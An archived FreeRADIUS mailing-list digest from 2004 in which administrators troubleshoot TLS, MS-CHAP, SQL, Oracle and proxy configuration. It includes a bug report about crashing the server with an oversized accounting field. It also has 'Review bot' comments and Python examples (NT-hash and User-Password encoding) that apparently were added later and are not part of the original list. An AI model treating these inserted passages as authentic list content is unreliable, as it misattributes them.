Unable to start Radius server with TLS configuration.
Dear team, I was working with a radius server configured with TLS, following the HOW-TO written by Raymond McKay. While starting the server, an error "rlm_eap: Failed to link EAP-Type/tls: file not found" comes up. Can anyone help me solve this problem and start the server? -- Regards, S.Suresh Babu 'You must be the change you wish to see in the world.' -M.K.Gandhi. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Normal one-time password at the same time
Thor Spruyt wrote: I would like to implement OTP (one-time password) and I tried to add a second record with the User-Password attribute for each user in radcheck. It seems that FreeRadius only allows the user in if he enters the password from the record with the highest id. Are there any possibilities to do such a thing for OTPs, so that the user can log in either with his real password or with his OTP? I have now found a way that seems to work. I created an additional sql { } and added it to the authorize section. This seems to work, but I'm wondering if it's a good way to do this or whether there are better ways? -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65
Re: new sqlcounter counter
Hello, please advise on the rlm_sqlcounter module. If I want to check not only on the User-Name attribute when giving Max-All-Session to some user but also on NAS-IP-Address, what should I change in sqlcounter.conf? Currently I have the default values as described in the doc file. Edgars

Edgars wrote: can someone assist with creating a new attribute named Hours-Counter? So, for example, if I set this attribute for a user to 1 hour then he could login/logout during this time as many times as he wants (it's also possible that he doesn't login at all), but after 1h access for this username will be disabled. So I added this to the sqlcounter.conf file, but got stuck on the query line. Could someone please write this query for me?

    sqlcounter hours {
        counter-name = Hours-Counter
        check-name = Hours
        sqlmod-inst = sqlcca3
        key = User-Name
        reset = never
        query =
    }

Thank you! Edgars
Re: Ntlm problem with peap
Hi, Running 1.0.0 on dual Intel, so little-endian. Apparently the challenge or nt-response is being generated wrongly, or it's a bug in ntlm_auth.

    rpm -qif /usr/bin/ntlm_auth
    Name: samba-common
    Version: 3.0.2

Any ideas? Is there any workaround to have PEAP with MSCHAPv2 working without ntlm? Thanks, Nuno Fernandes

On Mon, 2004-08-30 at 19:43, Alan DeKok wrote: Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: I'm having problems using freeradius with peap and ntlm. If you're running on a big endian machine, there's a bug in src/lib/md4.c which breaks MS-CHAP, and therefore PEAP. We hope to release 1.0.1 soon, to address this issue. Alan DeKok. -- Nuno Miguel Pais Fernandes [EMAIL PROTECTED]
How does one compile pam-radius auth???
I have copied the downloaded files to src/pam-radius and I modified the Makefile in src to include the directory pam-radius. When I run make I get the following (see below)... If I don't include pam-radius in the overall build, radius appears to build correctly. Thanks, Roger

    gmake[4]: Entering directory `/root/freeradius-1.0.0/src/pam-radius'
    cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o
    In file included from pam_radius_auth.c:63:
    pam_radius_auth.h:22:20: radius.h: No such file or directory
    In file included from pam_radius_auth.h:23,
                     from pam_radius_auth.c:63:
    /usr/include/md5.h:27: error: syntax error before UINT4
    /usr/include/md5.h:30: error: syntax error before '}' token
    /usr/include/md5.h:38: error: syntax error before PROTO_LIST
    /usr/include/md5.h:39: error: syntax error before PROTO_LIST
    /usr/include/md5.h:41: error: syntax error before PROTO_LIST
    /usr/include/md5.h:43: error: syntax error before PROTO_LIST
    pam_radius_auth.c:163: error: syntax error before ipstr2long
    pam_radius_auth.c:163: warning: return type defaults to `int'
Re: freeradius 1.0.0 crashes on oracle errors
Hello. I see a lot of 1401 errors in radiusd.log. But they do not lead to core dumps. Radiusd performs correctly. These errors come when users supply incorrect usernames that are longer than the username column size. We work on SPARC Solaris 2.8, gcc 3.3, Oracle 9.2.0.5, freeradius-1.0.0.

Kostas Zorbadelos [EMAIL PROTECTED] wrote: My environment is Solaris 2.8, gcc 2.95.3, Oracle 8.1.7. Freeradius crashes (and core dumps) after an sql query causes an error with an Oracle backend database. Yuck. First of all in oraclesql.conf there is a typo in the accounting_start_query_alt query: Fixed, thanks. Secondly, I caused the crash by sending an accounting start packet with a very large acct-session-id, which caused an ORA-01401 (inserted value too large for column) error. Ok. The server *should* be robust in the face of such errors. Should I submit a bug report in bugs.freeradius.org? Please. For anything else you might need to trace the error, please let me know. A gdb 'bt', so we can see where/when the error occurred. If you have access to a Linux box, you can try running it under valgrind, which should give you more information about the invalid memory accesses. Alan DeKok.
Re: Accounting issue
On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote: Erik Immers [EMAIL PROTECTED] wrote: Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS? You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf. Alan DeKok.

The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the NASes log to one detail file, and the other half to another detail file. As far as I see it is only possible either to put everything in one detail file, or every NAS in its own detail file. The only option I can think of is to do something with the huntgroup name, but I don't see any option to put that into the detail section of radiusd.conf. Might it be possible to create a variable in the users file to use in radiusd.conf, or something that will give me the same result? Example: add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in radiusd.conf:

    users file
    steve   Auth-Type := Local, User-Password == testing
            Service-Type = Framed-User,
            Framed-Protocol = PPP,
            Framed-IP-Address = 172.16.3.33,
            Framed-IP-Netmask = 255.255.255.0,
            Framed-Routing = Broadcast-Listen,
            Framed-Filter-Id = std.ppp,
            Framed-MTU = 1500,
            Framed-Compression = Van-Jacobsen-TCP-IP,
            HUNTGROUP-NAME = com21
    /users file

    radiusd.conf
    detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME}
    /radiusd.conf

Sorry if my explanation isn't all that clear. Erik Immers
proxying / realms / users file
Hello once more, I don't want to annoy you, hopefully I'm getting closer... Alan DeKok wrote: Is local or system the correct value to forward requests by using realm NULL? Neither.

First, is the realm NULL the preferred method to forward requests to another radius server? If so, I still need to figure out how to use it. After searching the mailing list archive I found a hint:

    DEFAULT Proxy-To-Realm := foo.com

Is that how it works? Not with any Auth-Type? Does this also work if the username doesn't contain that realm? I tried with this users file:

    DEFAULT Auth-Type := LDAP
    DEFAULT Proxy-To-Realm := students

and this proxy.conf:

    realm students {
        type = radius
        authhost = uml1:1812
        accthost = uml1:1813
        secret = hidden
    }

But then no requests are forwarded. The output of radiusd -X just shows

    rlm_realm: No '@' in User-Name = ben1812, looking up realm NULL
    rlm_realm: No such realm NULL

which is correct, of course. But if I use this configuration...

    DEFAULT Auth-Type := LDAP
    DEFAULT Proxy-To-Realm := NULL

and this proxy.conf:

    realm NULL {
        type = radius
        authhost = uml1:1812
        accthost = uml1:1813
        secret = hidden
    }

... FR forwards all requests and rejects users that are in the local ldap. (That's my very problem.) Just like without Proxy-To-Realm. Apart from that, the doc file proxy says that the users file is being processed after the proxying. Does this mean that I don't have to configure the proxying in the users file at all? If I'm completely wrong again could you please give me hints where to search or what to look for? Thanks for your patience and helpfulness. Benedikt Panzer
Re: help with rlm_sql_oracle
On Tue, Aug 31, 2004 at 09:42:42AM +0300, Ivan wrote: It should be possible to compile freeradius oracle support with only the oracle client installed. I also had various problems with the 9.2 oracle client (on my debian system) so I installed oracle client 8.1.7 rel3. If you set the ORACLE_HOME environment variable in the configure of freeradius, it should detect and build the oracle module without problems.

Dear FreeRadius.org community, We've got a problem during installation of FreeRadius server 1.0.0 for use with the Oracle database on FreeBSD. The next sample of the config.log file illustrates our problem:

    orabsd# ./configure
    .
    configuring in ./drivers/rlm_sql_oracle
    running /bin/sh ./configure --enable-ltdl-install --enable-ltdl-install --cache-file=../../../../.././config.cache --srcdir=.
    loading cache ../../../../.././config.cache
    checking for gcc... (cached) gcc
    checking whether the C compiler (gcc -g -O2 -pthread -D_THREAD_SAFE -DOPENSSL_NO_KRB5 -Wall -D_GNU_SOURCE -DNDEBUG ) works... yes
    checking whether the C compiler (gcc -g -O2 -pthread -D_THREAD_SAFE -DOPENSSL_NO_KRB5 -Wall -D_GNU_SOURCE -DNDEBUG ) is a cross-compiler... no
    checking whether we are using GNU C... (cached) yes
    checking whether gcc accepts -g... (cached) yes
    checking how to run the C preprocessor... (cached) gcc -E
    checking for oci.h... no
    configure: warning: oracle headers not found. Use --with-oracle-home-dir=path.
    configure: warning: sql submodule 'oracle' disabled
    updating cache ../../../../.././config.cache
    creating ./config.status
    creating Makefile
    .

As you see, we can't compile the rlm_sql_oracle driver. We were trying to install the FreeRadius server on a PC with Oracle client for FreeBSD 4.10-5.2.1 (we tried different releases of FreeBSD). We tried the following steps:

1. ./configure --with-oracle-home-dir=path to the oracle client directory
   ./configure --disable-shared --with-oracle-home-dir=path to the oracle client directory
2. ./configure --with-oracle-lib-dir=path to the oracle client lib directory, to the /rdbms/demo directory
   ./configure --disable-shared --with-oracle-lib-dir=path to the oracle client lib directory, to the /rdbms/demo directory
3. we also tried to compile the rlm_sql_oracle driver alone in the installation directory of the oracle client, but with no result.

Is it possible to install the FreeRadius server with oracle support on a PC with just the oracle client installed (without a basic installation of the Oracle database; we use a separate database server with Oracle 9.2i)? If yes, then which directory must contain the oracle client lib files? If it's not possible, then will it be possible to connect to the oracle database located on a remote PC? Hope to hear from you soon, with best regards, Ivan and Valery mailto:[EMAIL PROTECTED] -- Kostas Zorbadelos Currently at: Otenet IT Department mailto: [EMAIL PROTECTED] Out there in the darkness, out there in the night out there in the starlight, one soul burns brighter than a thousand suns.
Re: freeradius 1.0.0 crashes on oracle errors
On Tue, Aug 31, 2004 at 12:35:18PM +0400, Alexander Serkin wrote: Hello. I see a lot of 1401 errors in radiusd.log. But they do not lead to core dumps. Radiusd performs correctly. These errors come when users supply incorrect usernames that are longer than the username column size. We work on SPARC Solaris 2.8, gcc 3.3, Oracle 9.2.0.5, freeradius-1.0.0. Hmmm. I have a different compiler version and an older Oracle version (8.1.7). Have you tried to cause the 1401 error continuously and not sporadically? You can do that with radclient. Anyway I will submit a bug report with the gdb output.

Kostas Zorbadelos [EMAIL PROTECTED] wrote: My environment is Solaris 2.8, gcc 2.95.3, Oracle 8.1.7. Freeradius crashes (and core dumps) after an sql query causes an error with an Oracle backend database. Yuck. First of all in oraclesql.conf there is a typo in the accounting_start_query_alt query: Fixed, thanks. Secondly, I caused the crash by sending an accounting start packet with a very large acct-session-id, which caused an ORA-01401 (inserted value too large for column) error. Ok. The server *should* be robust in the face of such errors. Should I submit a bug report in bugs.freeradius.org? Please. For anything else you might need to trace the error, please let me know. A gdb 'bt', so we can see where/when the error occurred. If you have access to a Linux box, you can try running it under valgrind, which should give you more information about the invalid memory accesses. Alan DeKok. -- Kostas Zorbadelos Currently at: Otenet IT Department mailto: [EMAIL PROTECTED] Out there in the darkness, out there in the night out there in the starlight, one soul burns brighter than a thousand suns.
proxy support for RFC3576 disconnect requests?
Hi, does freeradius support proxying request messages as defined in RFC3576, especially the ones mentioned in 2.1, Disconnect Messages? Or does anybody know another radius implementation that supports this? I couldn't find anything about this on the web-site, FAQ, changelog and list-archive. Thanks. Ulf
Re: Normal one-time password at the same time
Thor Spruyt wrote: I have now found a way that seems to work. I created an additional sql { } and added it to the authorize section. This seems to work, but I'm wondering if it's a good way to do this or whether there are better ways? Huh... I found something nice accidentally...

    rlm_sql_postgresql: query: SELECT id, UserName, Attribute, Value, Op FROM radcheck2 WHERE Username = 'thor' ORDER BY id
    rlm_sql_postgresql: Status: PGRES_TUPLES_OK
    rlm_sql_postgresql: affected rows =
    rlm_sql: The 'op' field for attribute 'User-Password = xxx' is NULL, or non-existent.
    rlm_sql: You MUST FIX THIS if you want the configuration to behave as you expect.

So leaving the op field empty will result in FreeRadius trying to match both retrieved passwords! Am I doing something stupid here? -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65
Re: Normal one-time password at the same time
Thor Spruyt wrote: So leaving the op field empty will result in FreeRadius trying to match both retrieved passwords! Am I doing something stupid here? Never mind... it doesn't work :( -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65
MS-CHAP can't work
Can anyone help me? I am trying to create a PPTP connection to a CISCO router, and it seems to work fine if I use local authentication on the cisco. If I try to authenticate to FreeRadius with MS-CHAP, it still doesn't work after trying for a long time:

    rlm_mschap: No LM/NT password configured. Check authorization.
    modcall[authenticate]: module "mschap" returns invalid
    modcall: group authtype returns invalid
    auth: Failed to validate the user.

Who can comment on what's happening? Thank you very much!!! The configuration and the error messages are shown below.

Cisco configuration:

    username cisco password cisco
    vpdn-group 2
     ! Default PPTP VPDN group
     accept-dialin
      protocol pptp
      virtual-template 2
     local name vpdn
     pptp tunnel echo 0
     pptp flow-control receive-window 64
    interface Virtual-Template2
     ip unnumbered FastEthernet0/0
     peer default ip address pool pptp-pool
     ppp max-bad-auth 4
     ppp encrypt mppe auto
     ppp authentication ms-chap-v2

users file:

    test    Auth-Type := MS-CHAP, User-Password = "test"

(the variant

    test    Auth-Type := MS-CHAP, NT-Password = "$1$m8QDPK4O$.rEj97XgPB/FVHCb2BTNy0"

also failed)

radiusd.conf:

    module mschap {
        # Location of the SAMBA passwd file
        #
        #passwd = /etc/smbpasswd
        authtype = MS-CHAP
        use_mppe = yes
        require_encryption = yes
        require_strong = yes
    }

    authorize {
        preprocess
        mschap
        suffix
        files
    }

    authenticate {
        authtype CHAP {
            chap
        }
        authtype MS-CHAP {
            mschap
        }
    }

Debug output:

    rad_recv: Access-Request packet from host 202.145.138.34:1645, id=201, length=160
        Framed-Protocol = PPP
        User-Name = "test"
        MS-CHAP-Challenge = 0xb41e91a9541c4577966546a55c7cc157
        MS-CHAP2-Response = 0x02043146e52dbbb11f22672e6d1307329d5a46271c1c2b3aa7d159847e01970656a58c9a61fdefdc
        NAS-Port-Type = Virtual
        Cisco-NAS-Port = "Uniq-Sess-ID87"
        NAS-Port = 87
        Service-Type = Framed-User
        NAS-IP-Address = 202.145.138.34
    modcall: entering group authorize
      modcall[authorize]: module "preprocess" returns ok
      modcall[authorize]: module "mschap" returns notfound
        rlm_realm: No '@' in User-Name = "test", looking up realm NULL
        rlm_realm: No such realm NULL
      modcall[authorize]: module "suffix" returns noop
        users: Matched DEFAULT at 8
      modcall[authorize]: module "files" returns ok
    modcall: group authorize returns ok
    rad_check_password: Found Auth-Type MS-CHAP
    auth: type "MS-CHAP"
    modcall: entering group authtype
      rlm_mschap: No LM/NT password configured. Check authorization.
      modcall[authenticate]: module "mschap" returns invalid
    modcall: group authtype returns invalid
    auth: Failed to validate the user.
    Delaying request 1 for 1 seconds
    Finished request 1
    Going to the next request
    --- Walking the entire request list ---
    Waking up in 1 seconds...
    --- Walking the entire request list ---
    Waking up in 1 seconds...
    --- Walking the entire request list ---
    Sending Access-Reject of id 201 to 202.145.138.34:1645
        MS-CHAP-Error = "\002E=691 R=1"
    Waking up in 4 seconds...
    --- Walking the entire request list ---
    Cleaning up request 1 ID 201 with timestamp 413448bb
    Nothing to do. Sleeping until we see a request.

Davis Bai. Tel: 886-2-87883728 Ext. 540 Fax: 886-2-27881581 Email: [EMAIL PROTECTED]
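What rlm_mschap is actually looking for, as an added example (not the poster's configuration and not FreeRADIUS code): the NT-Password check item is the NtPasswordHash of RFC 2759, MD4 over the password encoded as UTF-16LE, written as 32 hex digits. A crypt(3)-style string beginning with $1$ is an md5-crypt hash, not an NT hash, so the second users entry above could never have matched. The block carries its own MD4 because hashlib on current OpenSSL builds may not provide one; the password "test" is the one from the users file above, the other inputs are the RFC 1320 test vectors.

```python
import struct

# Added example, not FreeRADIUS code: compute the NT-Password check item
# (RFC 2759 NtPasswordHash = MD4(UTF-16LE(password))) with a self-contained
# MD4 (RFC 1320), and tell a usable NT-Password value from a crypt(3) string.

_MASK = 0xFFFFFFFF


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & _MASK


def _md4_block(state, block):
    """One MD4 compression of a 64-byte block; returns the new state."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    rounds = (
        # (boolean function, word order, per-step shifts, round constant)
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for f, order, shifts, k in rounds:
        for i, j in enumerate(order):
            a = _rotl((a + f(b, c, d) + X[j] + k) & _MASK, shifts[i % 4])
            a, b, c, d = d, a, b, c          # next step works on the next register
    return tuple((s + v) & _MASK for s, v in zip(state, (a, b, c, d)))


def md4(data: bytes) -> bytes:
    # Padding as in MD5: 0x80, zeros to 56 mod 64, then the bit length (LE64).
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    for i in range(0, len(msg), 64):
        state = _md4_block(state, msg[i:i + 64])
    return struct.pack("<4I", *state)


def nt_password_hash(password: str) -> bytes:
    """RFC 2759 NtPasswordHash: MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le"))


def nt_password_check_item(password: str) -> str:
    """The value to put in an NT-Password check item: 32 hex digits."""
    return nt_password_hash(password).hex().upper()


def looks_like_nt_hash(value: str) -> bool:
    """True only for a 32-hex-digit string; '$1$...' (md5-crypt) is not usable."""
    return len(value) == 32 and all(ch in "0123456789abcdefABCDEF" for ch in value)


if __name__ == "__main__":
    print('test  Auth-Type := MS-CHAP, NT-Password == "%s"' % nt_password_check_item("test"))
    print("$1$m8QDPK4O$.rEj97XgPB/FVHCb2BTNy0 usable as NT-Password:",
          looks_like_nt_hash("$1$m8QDPK4O$.rEj97XgPB/FVHCb2BTNy0"))
```

The hash is computed over the UTF-16LE password, so an ASCII password of n characters hashes 2n bytes; getting that encoding wrong (or hashing the MD5-crypt string) is the usual reason a hand-built NT-Password never matches. Alan's reply further down says the same thing in one line: give rlm_mschap either a clear-text password or a real NT-Password.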
Re: Works but not working
Alan DeKok wrote: Beast [EMAIL PROTECTED] wrote: OK, these were the debug logs, one for PAP and one for MSCHAPv2. Once logged in to the VPN, the client pings some host; it works with PAP but not with MSCHAP. In both cases you haven't given any additional reply attributes to the NAS. I don't know why MS-CHAP works, but I'll bet that the NAS is looking for certain RADIUS attributes in the response, and you're not telling the server to send them. Alan DeKok.

What are the minimal reply attributes needed for MSCHAP to work? Would sniffing the radius packets help? Any recommended packet sniffer which is able to parse radius output? -- --beast
Re: Works but not working
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier.
1.0.0. Problems with check-radiusd-config and rlm_perl
Hello! Just now upgraded to 1.0.0. All works fine except check-radiusd-config and rlm_perl.

1. check-radiusd-config doesn't work with 1.0.0 because the -p option is deprecated. Why? IMHO, check-radiusd-config is useful when you need to check a new config while a working instance is running. So the -p option should stay (IMHO).

2. There is a memory leak in rlm_perl.c again. I had a memory leak before Jul 12. After installing rlm_perl from a snapshot the leak went away. I don't know exactly which version it was; there was the line "* Version: $Id: rlm_perl.c,v 1.13 2004/02/26 19:04:34 aland Exp $" in the source. The line is the same in the 1.0.0 version, but the files look different. diff -u rlm_perl.c-jul-12 rlm_perl.c-from_1.0.0 shows:

= @@ -40,6 +40,10 @@ #undef INADDR_ANY #endif +#ifdef INADDR_NONE +#undef INADDR_NONE +#endif + #include EXTERN.h #include perl.h #include XSUB.h @@ -48,39 +52,6 @@ static const char rcsid[] = $Id: rlm_perl.c,v 1.13 2004/02/26 19:04:34 aland Exp $; -#ifdef USE_ITHREADS - -/* - * Pool of Perl's clones (genetically cloned) ;) - * - */ -typedef struct pool_handle { - struct pool_handle *next; - struct pool_handle *prev; - enum {busy, idle} status; - unsigned intrequest_count; - PerlInterpreter *clone; - perl_mutex lock; -} POOL_HANDLE; - -typedef struct PERL_POOL { - POOL_HANDLE *head; - POOL_HANDLE *tail; - - int current_clones; - int active_clones; - int max_clones; - int start_clones; - int min_spare_clones; - int max_spare_clones; - int max_request_per_clone; - int cleanup_delay; - enum {yes,no} detach; - perl_mutex mutex; - time_t time_when_last_added; -} PERL_POOL; - -#endif skip =

When I run radiusd, it consumes about 60MB of RAM. After 15 minutes, about 200MB. And it grows. The previous version consumed 55-70MB even after a few days. So I think there is a memory leak again. Sincerely, Mike.
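Review bot: the first hunk (the new #ifdef INADDR_NONE / #undef INADDR_NONE / #endif placed after the existing #undef INADDR_ANY / #endif and ahead of #include perl.h) carries no comment, and the visible context gives none either; add a one-line comment saying that perl.h redefines INADDR_NONE and the server's own definition has to be dropped first, otherwise the next cleanup pass will remove it. This hunk is a preprocessor clash fix and allocates nothing, so it cannot be the source of the growth reported above.

Review bot: the second hunk only deletes the POOL_HANDLE and PERL_POOL typedefs (clone list, perl_mutex lock, the max_request_per_clone and cleanup_delay limits) from rlm_perl.c; nothing in the posted lines shows whether they moved to a header or whether the interpreter pool was dropped altogether, and the diff is cut off at "skip", so as posted the patch is incomplete. The full diff -u between the two files, including the hunks that touch the code that creates and releases clones, is what is needed before the growth from about 60MB to about 200MB can be tied to this change.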
RE: Accounting issue
Hunt groups are defined in the huntgroups file like:

    huntgroups
    COM21   NAS-IP-Address = 192.168.1.1
            Cisco-Gateway-Id = COM21
    COM22   NAS-IP-Address = 192.168.2.1
            NAS-IP-Address = 192.168.2.2
    /huntgroups

The Huntgroup-Name attribute will be appended automatically.

-----Original message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On behalf of Erik Immers Sent: Tuesday 31 August 2004 10:34 To: [EMAIL PROTECTED] Subject: Re: Accounting issue

On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote: Erik Immers [EMAIL PROTECTED] wrote: Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS? You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf. Alan DeKok.

The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the NASes log to one detail file, and the other half to another detail file. As far as I see it is only possible either to put everything in one detail file, or every NAS in its own detail file. The only option I can think of is to do something with the huntgroup name, but I don't see any option to put that into the detail section of radiusd.conf. Might it be possible to create a variable in the users file to use in radiusd.conf, or something that will give me the same result? Example: add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in radiusd.conf:

    users file
    steve   Auth-Type := Local, User-Password == testing
            Service-Type = Framed-User,
            Framed-Protocol = PPP,
            Framed-IP-Address = 172.16.3.33,
            Framed-IP-Netmask = 255.255.255.0,
            Framed-Routing = Broadcast-Listen,
            Framed-Filter-Id = std.ppp,
            Framed-MTU = 1500,
            Framed-Compression = Van-Jacobsen-TCP-IP,
            HUNTGROUP-NAME = com21
    /users file

    radiusd.conf
    detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME}
    /radiusd.conf

Sorry if my explanation isn't all that clear. Erik Immers
short password field from lucent stingers
hi - we're seeing a Lucent Stinger device sending radius requests with a password field that is shorter than the 16 octets required by the protocol. Now, some radius servers seem not to like this - but freeradius seems to work fine with it. I suspect that is because freeradius either ignores the length of that field, or copies it to a zero-padded buffer. Am I right? See the section of an email below for details... tariq

- have the Password and Chap-Password fields with 16 and 17 octets respectively - as seen in the trace 5 logs. This is as per protocol. However, the problem stinger seems to send short passwords such as:

    Password = 249!1931236170172
    Password = 2527217213237134130
    Password = 249!1931236170172

and so on... these are shorter than the normal:

    Password = 215y1601F224193187OM'0222197227          - 16 octets
    CHAP-Password = 1193202t18613624147145210n233.{9!;   - 17 octets

Is this evidence that the problem lucent stinger is malforming its packets? Or are there valid cases when the Password field is short?
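The length rule behind this question, as an added example (not code from the thread and not FreeRADIUS code): RFC 2865 section 5.2 hides User-Password by padding the clear-text password with NULs to a multiple of 16 octets and XORing each 16-octet block with MD5(shared secret + previous ciphertext block), the chain seeded with the Request Authenticator, so the attribute value is always between 16 and 128 octets and a multiple of 16. CHAP-Password is one identifier octet plus a 16-octet MD5, hence 17. A User-Password value shorter than 16 octets cannot have been produced by that procedure, and a receiver that pads it silently is guessing at the bytes it never received. The functions below encode, decode and validate the field; the shared secret and Request Authenticator in the usage are constructed test values.

```python
import hashlib
import hmac

# Added example, not FreeRADIUS code: RFC 2865 s5.2 User-Password hiding and
# the length check a receiver should apply before decoding. The secret and
# Request Authenticator used in the usage below are constructed test values.

BLOCK = 16


def user_password_field_is_valid(field: bytes) -> bool:
    """RFC 2865 s5.2: the String field is 16..128 octets and a multiple of 16."""
    return BLOCK <= len(field) <= 128 and len(field) % BLOCK == 0


def encode_user_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Pad with NULs to a multiple of 16, then XOR block i with
    MD5(secret + c_{i-1}), where c_0 is the 16-octet Request Authenticator."""
    if len(authenticator) != BLOCK:
        raise ValueError("Request Authenticator must be 16 octets")
    if not 0 < len(password) <= 128:
        raise ValueError("password must be 1..128 octets")
    padded = password + b"\x00" * (-len(password) % BLOCK)
    out = bytearray()
    prev = authenticator
    for i in range(0, len(padded), BLOCK):
        mask = hashlib.md5(secret + prev).digest()
        chunk = bytes(p ^ m for p, m in zip(padded[i:i + BLOCK], mask))
        out += chunk
        prev = chunk                     # the ciphertext block feeds the next mask
    return bytes(out)


def decode_user_password(field: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of encode_user_password. A field that breaks the length rule is
    rejected rather than padded or truncated."""
    if not user_password_field_is_valid(field):
        raise ValueError(f"malformed User-Password: {len(field)} octets")
    out = bytearray()
    prev = authenticator
    for i in range(0, len(field), BLOCK):
        chunk = field[i:i + BLOCK]
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ m for c, m in zip(chunk, mask))
        prev = chunk
    return bytes(out).rstrip(b"\x00")    # strip the NUL padding


def password_matches(field: bytes, secret: bytes, authenticator: bytes, expected: bytes) -> bool:
    """What a server does with the attribute: decode, then compare in constant time."""
    try:
        got = decode_user_password(field, secret, authenticator)
    except ValueError:
        return False
    return hmac.compare_digest(got, expected)


if __name__ == "__main__":
    secret, auth = b"testing123", bytes(range(16))       # constructed values
    field = encode_user_password(b"hunter2", secret, auth)
    print(len(field), "octets on the wire:", field.hex())
    print("15-octet field accepted:", password_matches(field[:15], secret, auth, b"hunter2"))
```

Note that the first block's mask depends only on the secret and the Request Authenticator, so two requests with the same authenticator leak whether the first 16 octets of the passwords are equal; that is a property of the RFC 2865 scheme, not of this code, and is one reason a NAS must use a fresh Request Authenticator per request.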
Re: Unable to start Radius server with TLS configuration.
sureshbabu [EMAIL PROTECTED] wrote: While starting the server, an error "rlm_eap: Failed to link EAP-Type/tls: file not found" comes up. Can anyone help me solve this problem and start the server? Did you check if the module exists at *all* on your system? Alan DeKok.
Re: Ntlm problem with peap
Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: Running 1.0.0 on dual Intel, so little-endian. Apparently the challenge or nt-response is being generated wrongly, or it's a bug in ntlm_auth. I've been running it on an x86 for a while, and I haven't seen any problems like that. Any ideas? Is there any workaround to have PEAP with MSCHAPv2 working without ntlm? Yes, supply a clear-text, or NT-Password. Alan DeKok.
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote: I have copied the downloaded files to src/pam-radius and I modified the Makefile in src to include the directory pam-radius. Why? If I don't include pam-radius in the overall build, radius appears to build correctly. Why are you including pam-radius in the freeradius build? I don't understand what you're doing, or why you think it's necessary. Alan DeKok.
Re: Bug/security EAP-TLS
Joey Nix [EMAIL PROTECTED] wrote: So will it be:

    case handshake:
        if (tls_session->info.handshake_type == finished) {
            DEBUG2("rlm_eap_tls: ack handshake is finished");
            return EAPTLS_SUCCESS;
        }
        DEBUG2("rlm_eap_tls: ack handshake fragment handler");
        /* Fragmentation handler, send next fragment */
        return EAPTLS_REQUEST;

Yes.

or will it be:

    case handshake:
        if (tls_session->info.handshake_type == finished) {
            DEBUG2("rlm_eap_tls: ack handshake is finished");
            return EAPTLS_SUCCESS;
        }
    default:
        DEBUG2("rlm_eap_tls: ack default");
        radlog(L_ERR, "rlm_eap_tls: Invalid ACK received: %d",

No. That would make it impossible for multi-ack sessions to work, and would require that everything be sent in only one SSL packet. Alan DeKok.
Re: proxying / realms / users file
Benedikt Panzer [EMAIL PROTECTED] wrote: First, is the realm NULL the preferred method to forward requests to another radius server? That depends on your system. If so, I still need to figure out how to use it. After searching the mailing list archive I found a hint: DEFAULT Proxy-To-Realm := foo.com. Is that how it works? Not with any Auth-Type? Yes. The home server authenticates the user. FreeRADIUS *could* have Auth-Type = Proxy, but that would be pointless. Does this also work if the username doesn't contain that realm? Yes. I tried with this users file:

    DEFAULT Auth-Type := LDAP
    DEFAULT Proxy-To-Realm := students

You're telling the server to use LDAP *always*, and to *never* proxy the request. Please read the man page for the users file. But if I use this configuration...

    DEFAULT Auth-Type := LDAP
    DEFAULT Proxy-To-Realm := NULL

and this proxy.conf:

    realm NULL {
        type = radius
        authhost = uml1:1812
        accthost = uml1:1813
        secret = hidden
    }

... FR forwards all requests and rejects users that are in the local ldap. (That's my very problem.) Just like without Proxy-To-Realm. At this point, I don't believe you. Or, the configuration you quoted above is NOT what you're actually running. You've re-typed it, rather than quoting it, and what you've posted here is NOT what is running in your server. If you don't describe your system accurately, it's impossible to help you. Apart from that, the doc file proxy says that the users file is being processed after the proxying. Does this mean that I don't have to configure the proxying in the users file at all? No. Alan DeKok.
Re: proxy support for RFC3576 disconnect requests?
Ulf Bremer [EMAIL PROTECTED] wrote:
> does freeradius support proxying requests messages as defined in RFC3576, especially the ones mentioned in 2.1. Disconnect Messages? Or does anybody know another radius implementation that supports this?

No open source server supports this that I know of.

FreeRADIUS doesn't support this, but it wouldn't be too hard to add:

- add a new RAD_LISTEN type
- update packet_ok() to handle the new type, and return a new function pointer
- update src/main/mod*, to handle a new sub-section

